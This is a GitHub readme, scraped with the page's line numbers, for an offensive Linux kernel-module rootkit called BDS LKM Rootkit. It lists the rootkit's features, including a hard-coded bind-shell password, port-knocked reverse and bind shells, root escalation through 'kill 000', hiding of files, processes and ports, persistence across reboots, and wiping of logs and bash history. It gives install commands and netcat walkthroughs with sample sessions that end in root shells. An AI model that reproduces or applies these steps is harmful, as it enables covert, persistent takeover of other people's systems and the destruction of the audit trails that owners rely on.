-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathreadme.txt
145 lines (95 loc) · 4.57 KB
/
readme.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
==============================BDS LKM ROOTKIT
Linux Loadable Kernel Module Rootkit for Linux Kernel 5.x and 6.x on x86_64.
Developed by : Antonius
Website : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
This lkm rootkit works on x64 architecture only.
=====FEATURES=====
- hides files and directories with prefix bds_
- port knocking bind shell (bind shell password is : bluedragonsec)
- port knocking reverse shell
- privilege escalation using kill 000 command
- hides bind shell and reverse shell port from netstat
- hides bind shell and reverse shell process
- rootkit persistence to survive after reboot
- hides module
- cleans logs and bash history during installation
=====INSTALLATION=====
You need root privilege for installing this rootkit.
In case you have installed linux kernel headers, make and gcc, install it by running the installer script:
./install.sh direct
In case you have not installed linux kernel headers, make and gcc, install it by running the installer script :
./install.sh
=====USING THE ROOTKIT=====
==Privilege Escalation
Once the rootkit installed on the system, in case you lost root privilege, you can regain root privilege by typing : kill 000
____________________________________________________________________
robotsoft@robotsoft:~$ id
uid=1000(robotsoft) gid=1000(robotsoft) groups=1000(robotsoft),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),999(sambashare)
robotsoft@robotsoft:~$ kill 000
robotsoft@robotsoft:~$ id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),999(sambashare),1000(robotsoft)
___________________________________________________________________
==Activating Reverse Shell
To activate reverse shell, you need to set up a port listener using netcat on port 31337, then do port knocking to your target server (with rootkit installed) on port 1337.
On your machine, open terminal and type:
__________________
nc -l -p 31337 -v
__________________
Open another terminal tab and do port knocking to target server :
____________________
nc server ip 1337
____________________
Wait a few seconds and you will get reverse shell port connection from your target server.
Example (server ip address with rootkit installed is at 192.168.0.102):
____________________________________________
robotsoft@robotsoft:~$ nc -l -p 31337 -v
Listening on 0.0.0.0 31337
_____________________________________________
Do port knocking to target ip address (with rootkit installed) :
___________________________________________________
robotsoft@robotsoft:~$ nc 192.168.0.102 1337
___________________________________________________
Back on your previous netcat listener, you will receive a reverse shell connection :
__________________________________________________
robotsoft@robotsoft:~$ nc -l -p 31337 -v
Listening on 0.0.0.0 31337
Connection received on 192.168.0.102 44052
Linux robotsoft 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
__________________________________________________
== Activating Bind Shell
To activate bind shell, you need to do port knocking to your target server (with rootkit installed) on port 1338. The bind shell password is : bluedragonsec
On your machine, open terminal and type:
_________________________________
nc server ip 1338
Wait a few seconds then type:
nc server ip 31337
type the password : bluedragonsec
__________________________________
Example (server ip address with rootkit installed is at 192.168.0.102):
_________________________________________________________
robotsoft@robotsoft:~$ nc 192.168.0.102 1338
(wait a few seconds)
robotsoft@robotsoft:~$ nc 192.168.0.102 31337
Password :bluedragonsec
Linux robotsoft 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
__________________________________________________________
==Hiding Files and Directories
To hide file and directory just give prefix bds_ to file name and directory name
==How to Clean Logs and Bash History ?
Before running installation script, add username to clean logs to usernames_to_clear_logs.txt in new line, example:
_________
root
robotsoft
_________
User logs will be cleaned during rootkit installation
==Persistence
The rootkit is activated every time the system starts up. After the reboot, wait for 1 minute, the rootkit will be loaded into kernel.
==Process Hiding
This rootkit hides bind shell process and reverse shell process.
==Port Hiding
This rootkit hides bind shell port and reverse shell port.